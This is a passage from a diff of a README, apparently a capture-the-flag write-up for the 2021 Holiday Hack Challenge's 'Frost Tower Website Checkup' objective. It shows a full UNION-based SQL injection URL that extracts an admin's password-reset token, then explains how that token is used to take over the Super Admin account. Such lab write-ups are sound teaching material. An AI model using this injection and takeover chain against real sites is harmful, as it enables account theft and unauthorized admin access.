joergschwarzwaelder/hhc2021/Objective-12/README.md

 https://staging.jackfrosttower.com/detail/0,0 union select * from (select 1)a join (select 2)b join (select 3)c join (select token from users where email="root@localhost")d join (select 4)e join (select 5)f join (select 6)g;--
 ```

-Using the URL https://staging.jackfrosttower.com/forgotpass/token/{retrieved token} it is possible to set a new password for the "Super Admin" user.
+Using the URL https://staging.jackfrosttower.com/forgotpass/token/{retrieved%20token} it is possible to set a new password for the "Super Admin" user.
 Being logged on as this user, a new personalized user with "Super Admin" privileges can be created.

 **Achievement: Frost Tower Website Checkup**